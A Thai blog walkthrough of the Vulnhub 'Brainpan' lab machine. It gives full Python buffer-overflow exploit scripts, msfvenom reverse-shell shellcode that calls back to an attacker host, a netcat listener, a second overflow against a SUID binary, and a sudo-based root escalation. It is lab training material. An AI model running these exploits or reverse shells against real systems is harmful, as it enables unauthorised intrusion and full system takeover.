วิธีการผ่าน Brain Pa(i)n – Vulnhub
กลับมาอีกครั้งกับการโพสต์เกี่ยวกับการทำ lab hack อย่างในคราวนี้ก็คือ Virtual Machine จาก Vulnhub.com ในชื่อว่า Brainpan สามารถ download ได้จาก link นี้ครับ
Kali: 192.168.56.101
1. เริ่มต้นด้วยการหา IP เป้าหมายก่อน โดยใช้ nmap
|
1 |
nmap -sn 192.168.56.0/24 |
2. scan port 192.168.56.100
พบ port ที่เปิดอยู่คือ 9999, 10000
3. เข้าไปใช้งาน port 9999 พบว่าเป็น service terminal อะไรซักอย่างที่เรายังไม่ทราบว่า password คืออะไร
4. ทดสอบเข้าใช้งาน port 10000 ปรากฏว่าเป็น website ที่แสดงสถิติการโจมตีในรูปแบบต่างๆ
5. scan 192.168.56.100:10000 ด้วย nikto
พบ path ที่ชื่อว่า bin อยู่
6. พอเข้าไปก็พบว่ามีไฟล์ brainpan.exe อยู่
พอลองตรวจสอบดูก็พบว่าเป็น file PE 32bit
พอหา string ภายในไฟล์ก็ไม่ได้อะไร แต่ที่ทำให้เดาได้คือ มันคือ service ที่รันอยู่ port 9999 นั่นเอง
7. พอลองเอามารันใน Windows XP 32bit ก็พบว่าเป็น service ที่รอรับ password ใน port 9999 จริงๆด้วย
8. จากนั้นก็ลองไปเรื่อย ทั้งหา path, ทั้งไล่ดู port อื่น, และอื่นๆ เมื่อไปต่อไม่ได้และสิ้นหนทางก็เลยกลับมาคิดว่าไอ้ exe นี้น่าจะทำอะไรได้ ก็เลยเอามาเข้า Ollydbg เพื่อทำการ debug ดู เลยเริ่มจากการรัน brainpan.exe ก่อน จากนั้นก็เปิด Ollydbg ขึ้นมา
ไปที่ File -> Attach จากนั้นเลือก brainpan.exe
9. เมื่อทำการ attach process ตัว process จะอยู่ในสถานะ pause อยู่ ให้ทำการกดปุ่ม Play สีฟ้า เพื่อให้ตัว process อยู่ในสถานะ Running (ดูสถานะของ process ได้ที่ด้านล่างขวาของ Ollydbg)
10. สร้าง python script สำหรับการส่งตัว A 1000 ตัวไปยัง port 9999
|
1 2 3 4 5 6 7 8 9 10 11 |
#!/usr/bin/env python import socket host = "10.211.55.39" port = 9999 client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((host,port)) print (client.recv(1024)) buff = "A"*1000 client.sendall(buff.encode()) print (client.recv(1024)) client.close() |
เมื่อส่งไปแล้วให้เรากลับไปดูที่ Ollydbg จะพบว่า Registry EDX และ ESP มีค่า A เต็มไปหมด และตัวที่สำคัญสุดที่เราต้องการไปเปลี่ยนแปลงนั่นคือ EIP นั้นก็ถูกแทนที่ด้วย 41 ซึ่งมืค่าเท่ากับ “A” เต็มไปหมด เพราะตัวโปรแกรมเองมีช่องโหว่ที่ชื่อว่า “Buffer Overflow” นั่นเอง
*** EIP คือ Registry ที่จะชี้ว่าตำแหน่งต่อไปที่เราจะไปทำงานต่อคือตำแหน่งไหน
ซึ่งพอ EIP มันเป็นค่า 41414141 แล้วมันไม่สามารถทำงานต่อได้จึงเกิด error
ประเด็นคือเราต้องการควบคุมตัว EIP เพื่อที่จะได้กำหนดว่าคำสั่งถัดไปที่โปรแกรมจะไปทำงานคือ shellcode หรือคำสั่งของเราคืออะไร ซึ่งตอนนี้เรายังไม่รู้เพราะเราใส่ไป 1000 ตัวอักษร เราไม่รู้ว่า EIP นั้นถูกเขียนทับด้วยค่า A ตรงตำแหน่งตัวอักษรที่เท่าไหร่
11. ใช้ script ที่ชื่อว่า pattern_create.rb สร้าง string ที่มี pattern ขึ้นมา โดยในที่นี้เราจะสร้าง string ที่มี pattern และความยาวไม่เกิน 1000 ตัวอักษรจะใช้คำสั่งเป็น
|
1 |
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000 |
จากนั้นเอาไปใส่แทนตัว buff แล้วส่งใหม่ พบว่าค่าของ EIP เปลี่ยนไปเป็น “35724134”
12. ใช้ script ที่ชื่อว่า pattern_offset.rb เพื่อหาว่าตำแหน่งที่ว่ามันคือตำแหน่งที่เท่าไหร่ ใช้คำสั่งเป็น
|
1 |
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134 -l 1000 |
ก็จะทำให้ทราบว่ามันคือเริ่มที่ตำแหน่ง 524 เราก็เอา A*524 + ค่าตำแหน่งที่เราต้องการ
13. ทดสอบเปลี่ยนค่า EIP เป็น “B” ก็จะได้เป็น buff = “A”*524 + “B”*4 + “A”*(1000-524-4) ออกมาเป็น
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
#!/usr/bin/env python import socket host = "10.211.55.39" port = 9999 client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((host,port)) print (client.recv(1024)) #buff = "A"*1000 buff = "A"*524 + "B"*4 + "C"*(1000-524-4) client.sendall(buff.encode()) print (client.recv(1024)) client.close() |
และถ้าดูจากช่อง Memory มุมล่างขวาจะพบว่า ตำแหน่งที่ C ไปอยู่คือตำแหน่ง 0022F960 ซึ่งคือตำแหน่งเดียวกับ ESP พอดีด้วย
และถ้าดูจากจำนวนแถวของ C จะพบว่ามีทั้งสิ้น 1D4 (4 + (13*16) + (1*256)) = 468 Byte แสดงว่าเราสามารถใส่ shell code ด้านหลังได้ 468 byte นั่นเอง
14. หา bad character ที่จะถูกมองว่าเป็นค่า NULL หรือก็คือว่างเปล่า ทำให้ตัวอักษรที่หลังจากตำแหน่งนั้นๆหายไป โดยการส่งตัวอักษรทั้งหมดไปยังปลายทาง หากว่าตัวอักษรตรงจุดไหนหายไปพร้อมกับทำให้ที่เหลือถูกตั้งทิ้งไปด้วย นั่นหมายความว่าตัวนั้นคือ bad character นั่นเอง
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
#!/usr/bin/env python import socket host = "10.211.55.39" port = 9999 client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((host,port)) print (client.recv(1024)) #buff = "A"*1000 badchar=( "\0x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) buff = "A"*524 + "B"*4 client.send(buff.encode()+badchar) print (client.recv(1024)) client.close() |
คลิ๊กขวาที่ ESP แล้วเลือก Follow in Dump เพื่อไปดูส่วน memory ได้ง่ายๆ
พบว่าตัวที่เป็น Bad Character คือ 0x00
15. ทีนี้เรารู้ว่า ESP คือตำแหน่งเริ่มของ Shellcode ของเรา ดังนั้นสิ่งที่เราต้องการเปลี่ยน EIP คือการไปยังคำสั่งที่เป็น “JMP ESP” หมายถึงการกระโดดไปทำงานที่ตำแหน่ง ESP นั่นเอง โดยให้ไปที่ View -> Executable Modules -> กดเปิดที่ brainpan แล้ว คลิ๊กขวาภายใน brainpan execution module เลือก Search for -> All commands
กรอกใส่เป็น JMP ESP เพื่อหาตำแหน่งที่เก็บคำสั่ง JMP ESP ไว้
เราก็จะพบว่าตำแหน่งที่ว่าคือ 311712F3 หรือเขียนอ้างอิงเป็น “\xf3\x12\x17\x31” นั่นเอง
16. สร้าง backdoor python file ด้วย metasploit
|
1 |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=4455 -b '\x00' -f python -o windows.py -v shellcode |
จะได้ shell code มา ให้เปลี่ยนตรงจุด B และ C เป็น JMP ESP และ Shellcode ตามลำดับ
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
#!/usr/bin/env python import socket host = "10.211.55.39" port = 9999 client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((host,port)) print (client.recv(1024)) #buff = "A"*1000 buff = "A"*524 EIP = "\xf3\x12\x17\x31" shellcode = "" shellcode += "\xdb\xcc\xbb\x81\x16\xe6\x22\xd9\x74\x24\xf4\x5d" shellcode += "\x29\xc9\xb1\x54\x83\xed\xfc\x31\x5d\x14\x03\x5d" shellcode += "\x95\xf4\x13\xde\x7d\x7a\xdb\x1f\x7d\x1b\x55\xfa" shellcode += "\x4c\x1b\x01\x8e\xfe\xab\x41\xc2\xf2\x40\x07\xf7" shellcode += "\x81\x25\x80\xf8\x22\x83\xf6\x37\xb3\xb8\xcb\x56" shellcode += "\x37\xc3\x1f\xb9\x06\x0c\x52\xb8\x4f\x71\x9f\xe8" shellcode += "\x18\xfd\x32\x1d\x2d\x4b\x8f\x96\x7d\x5d\x97\x4b" shellcode += "\x35\x5c\xb6\xdd\x4e\x07\x18\xdf\x83\x33\x11\xc7" shellcode += "\xc0\x7e\xeb\x7c\x32\xf4\xea\x54\x0b\xf5\x41\x99" shellcode += "\xa4\x04\x9b\xdd\x02\xf7\xee\x17\x71\x8a\xe8\xe3" shellcode += "\x08\x50\x7c\xf0\xaa\x13\x26\xdc\x4b\xf7\xb1\x97" shellcode += "\x47\xbc\xb6\xf0\x4b\x43\x1a\x8b\x77\xc8\x9d\x5c" shellcode += "\xfe\x8a\xb9\x78\x5b\x48\xa3\xd9\x01\x3f\xdc\x3a" shellcode += "\xea\xe0\x78\x30\x06\xf4\xf0\x1b\x4e\x39\x39\xa4" shellcode += "\x8e\x55\x4a\xd7\xbc\xfa\xe0\x7f\x8c\x73\x2f\x87" shellcode += "\xf3\xa9\x97\x17\x0a\x52\xe8\x3e\xc8\x06\xb8\x28" shellcode += "\xf9\x26\x53\xa9\x06\xf3\xce\xa3\x90\xf6\xdd\x83" shellcode += "\x63\x6f\xe0\xeb\x72\x08\x6d\x0d\x24\x86\x3d\x82" shellcode += "\x84\x76\xfe\x72\x6c\x9d\xf1\xad\x8c\x9e\xdb\xc5" shellcode += "\x26\x71\xb2\xbe\xde\xe8\x9f\x35\x7f\xf4\x35\x30" shellcode += "\xbf\x7e\xbc\xc4\x71\x77\xb5\xd6\x65\xe6\x35\x27" shellcode += "\x75\x83\x35\x4d\x71\x05\x61\xf9\x7b\x70\x45\xa6" shellcode += "\x84\x57\xd5\xa1\x7a\x26\xec\xda\x4c\xbc\x50\xb5" shellcode += "\xb0\x50\x51\x45\xe6\x3a\x51\x2d\x5e\x1f\x02\x48" shellcode += "\xa1\x8a\x36\xc1\x37\x35\x6f\xb5\x90\x5d\x8d\xe0" shellcode += "\xd6\xc1\x6e\xc7\x65\x05\x90\x95\x4b\xae\xf9\x65" shellcode += "\xcb\x4e\xfa\x0f\xcb\x1e\x92\xc4\xe4\x91\x52\x24" shellcode += "\x2f\xfa\xfa\xaf\xa1\x48\x9a\xb0\xe8\x0d\x02\xb0" shellcode += "\x1e\x96\x53\x3f\xe1\x29\x5c\xc1\xde\xff\x65\xb7" shellcode += "\x27\x3c\xd2\xc8\x12\x61\x73\x43\x5c\x35\x83\x46" last = "C"*(1000-524-4-360-16) client.send(buff.encode()+EIP+"\x90"*16+shellcode+last.encode()) print (client.recv(1024)) client.close() |
“\x90” เป็น padding ใส่ไว้ด้านหน้ากันตัว shellcode ถูกทับครับ
สร้าง Listener ของ Metasploit ไว้รอ connection ด้วย
รัน exploit โลด ก็จะได้ shell ครับ
17. ทีนี้ก่อนหน้านี้เราลองกับเครื่องเทสของเราซึ่งเป็น Windows ไปแล้ว ต่อไปจะยิง exploit ไปยังเครื่องจริงๆซึ่งเป็น Linux กันบ้าง เมื่อเปลี่ยน OS ดังนั้นเราต้องสร้าง shellcode ใหม่ครับ
|
1 |
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=4466 -b '\x00' -f python -o linux.py -v shellcode |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
#!/usr/bin/env python import socket host = "192.168.56.100" port = 9999 client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((host,port)) print (client.recv(1024)) #buff = "A"*1000 buff = "A"*524 EIP = "\xf3\x12\x17\x31" last = "C"*(1000-524-4-95-16) shellcode = "" shellcode += "\xdd\xc3\xd9\x74\x24\xf4\xbe\x01\x56\xc9\x69\x5f" shellcode += "\x2b\xc9\xb1\x12\x31\x77\x17\x03\x77\x17\x83\xc6" shellcode += "\x52\x2b\x9c\xf9\x81\x5c\xbc\xaa\x76\xf0\x29\x4e" shellcode += "\xf0\x17\x1d\x28\xcf\x58\xcd\xed\x7f\x67\x3f\x8d" shellcode += "\xc9\xe1\x46\xe5\x09\xb9\x81\x90\xe1\xb8\xf1\x4b" shellcode += "\x80\x35\x10\xdb\x02\x16\x82\x48\x78\x95\xad\x8f" shellcode += "\xb3\x1a\xff\x27\x22\x34\x73\xdf\xd2\x65\x5c\x7d" shellcode += "\x4a\xf3\x41\xd3\xdf\x8a\x67\x63\xd4\x41\xe7" client.send(buff.encode()+EIP+"\x90"*16+shellcode+last.encode()) print (client.recv(1024)) client.close() |
18. ทำ Netcat listener ไว้รอ connection
|
1 |
nc -lvp 4466 |
ยิง แล้วก็จะได้ shell มาครับ
พอเข้าไปได้เสร็จปั้บยังไม่จบ เพราะตัว privilege ที่เราได้คือ puck ซึ่งเราสามารถใช้คำสั่งในสิทธิ์ root ได้คือ
19. พอรันแล้วพบว่าเป็นการใช้งานคำสั่งทั่วไป ซึ่งเราใช้ได้ 2 คำสั่งคือ network และ proclist หรือก็คือ ifconfig กับการ list คำสั่งแต่เนื่องด้วยตัว app ไม่รู้จัก terminal ของเราเลยรันไม่ได้
จะโหลดไฟล์ดังกล่าวกลับมาวิเคราะห์ก็เข้าไปไม่ได้ ก็เลยเบนเป้าไปหาอย่างอื่นก่อน แต่เท่าที่เรารู้คือ /home/anansi/bin/anansi_util น่าสนใจ และ user anansi ก็น่าสนใจเช่นกัน
พยายามทำเรื่อง privilege escalation ต่อโดยการหาไฟล์ที่เป็น sticky bit (ไฟล์ที่จะรันโดยใช้สิทธิ์ของ user ผู้สร้างไฟล์นั้นๆแทนที่จะเป็นใช้สิทธิ์ของ user ได้)โดยใช้คำสั่ง
|
1 |
find / -perm -4000 -type f |
เจอไฟล์ /usr/local/bin/validate น่าสนใจ
จะเห็นว่าไฟล์นี้เป็นของ anansi ซึ่งเป็นตัวเป้าหมายของเรา และไฟล์นี้ก็เป็น Binary อีกแล้ว คราวนี้ไฟล์ดังกล่าว ถ้าเราได้สิทธิ์ของ anansi มาเราก็อาจจะทำอะไรต่อก็เป็นได้ เมื่อลองรันดูปรากฏว่าตัว validate มันการตรวจสอบอะไรซักอย่าง
ซึ่งไม่ว่าจะใส่อะไรไปมันก็ส่งผลเป็นคำว่า pass หมดเลย
ลองใส่ตัวอักษรเข้าไป 150 ตัวก็ปรากฏว่าเกิด error “Segmentation Fault”
20. หลังจากก่อนหน้าเราทำ buffer overflow ใน Windows มาก่อน คราวนี้ต้องมาทำใน Linux กันต่อสินะ (=_=”) ผมเลย download validate กลับมาที่เครื่อง Kali ก่อนครับจากนั้นค่อยมาหา Buffer Overflow อีกที และตัว debugger ที่คราวนี้เลือกใช้คือ gdb นั่นเอง
ซึ่งตัว Kali ที่ผมใช้ดันเป็น 64bit แต่ตัว Brainpan เป็น 32bit ดังนั้นจำเป็นต้อง add 32bit architecture เข้าไปก่อน โดยใช้คำสั่ง
|
1 2 3 |
sudo dpkg --add-architecture i386 sudo apt-get update sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386 |
เปิดใช้งาน validate ผ่าน gdb
|
1 |
gdb -q validate |
21. พอเรารัน validate โดยใช้คำสั่ง
|
1 |
r $(python -c "print 'A'*150") |
พบว่า EIP มีค่าเป็น 41414141
22. สร้าง pattern string ด้วย patter_create.rb อีกที
|
1 |
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 150 |
พบว่า EIP เปลี่ยนเป็น 39644138
23. หาตำแหน่งตัวอักษรที่กำหนด EIP โดยใช้ pattern_offset
|
1 |
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39644138 -l 150 |
พบว่าตำแหน่งที่เกิดคือ 116
24. ทดสอบกำหนด EIP ด้วยการใส่ A 116 ตัวแล้วตามด้วย B 4 ตัวปรากฏว่า EIP กลายเป็น 42424242 ตามที่เราต้องการ
25. หาว่าเราจะใส่ shell code ของเราไปไว้ตรงไหนของ Registry
x/s เพื่อแสดงค่าภายใน registry ใดๆ
พบว่า EAX คือตัวที่จะเก็บค่าทุกอย่างที่เราเก็บไว้ ซึ่งจากตรงจุดนี้เราสามารถเขียน shell code ขนาด 116 byte ได้นั่นเอง
พอดูใน ESP พบว่าเป็น C ทั้งหมดที่เราใส่ลงไป
26. ต่อไปคือเราจะทำการกำหนด EIP ไปยังตัว JMP ซึ่งการหาตำแหน่งดังกล่าว เราจำเป็นต้อง download ตัวหาว่าใน execution file มี JMP/CALL ตรงไหนบ้าง นั่นคือ JMPBuster นั่นเอง
|
1 2 3 |
git clone https://github.com/crowell/jmpbuster gcc -o jmpbuster jmpbuster.c ./jmpbuster /root/Downloads/validate |
หรือจะใช้
|
1 2 |
objdump -d validate | grep -i jmp objdump -d validate | grep -i call |
ก็ได้เหมือนกันครับ
พบว่ามี call eax มีที่ตำแหน่ง 0x080484af และ 0x0804862b แต่ไม่มี jmp esp เลย นั่นหมายความว่าเราคงไม่มีทางเลือก นอกเหนือจากการใส่ shell code ของเราใน EAX
27. สร้าง payload ที่เป็นการรันภายในเครื่อง
|
1 |
msfvenom -p linux/x86/exec CMD=/bin/sh -f c |
หรือจะทำเป็น
|
1 |
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=4488 -b "x00x0axff" -f c -o extend.py |
จะได้ payload เป็นดังนี้
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
#!/usr/bin/env python buf = "" buf += "\xda\xd6\xd9\x74\x24\xf4\xbd\xde\x1e\x3f\x7c\x5f\x29" buf += "\xc9\xb1\x0b\x31\x6f\x1a\x03\x6f\x1a\x83\xef\xfc\xe2" buf += "\x2b\x74\x34\x24\x4a\xdb\x2c\xbc\x41\xbf\x39\xdb\xf1" buf += "\x10\x49\x4c\x01\x07\x82\xee\x68\xb9\x55\x0d\x38\xad" buf += "\x6e\xd2\xbc\x2d\x40\xb0\xd5\x43\xb1\x47\x4d\x9c\x9a" buf += "\xf4\x04\x7d\xe9\x7b" nop = "\x90"*(116-len(buf)) eip = '\xaf\x84\x04\x08' print buf+nop+eip |
28. Run exploit เป็น input ของ validate ก็จะได้ session ของ anansi มา
29. ในเมื่อเราเข้าเป็น anansi ได้แล้ว ต่อมาก็คือการแก้ไขโดยการเอา “/bin/bash” ไปใส่ใน /home/anansi/bin/anansi_util
|
1 |
echo "/bin/bash" > /home/anansi/bin/anansi_util |
30. กลับไปใช้งาน puck รัน /home/anansi/bin/anansi_util ด้วย sudo อีกที ก็จะได้สิทธิ์ root มา
LINE@Techsuii.com
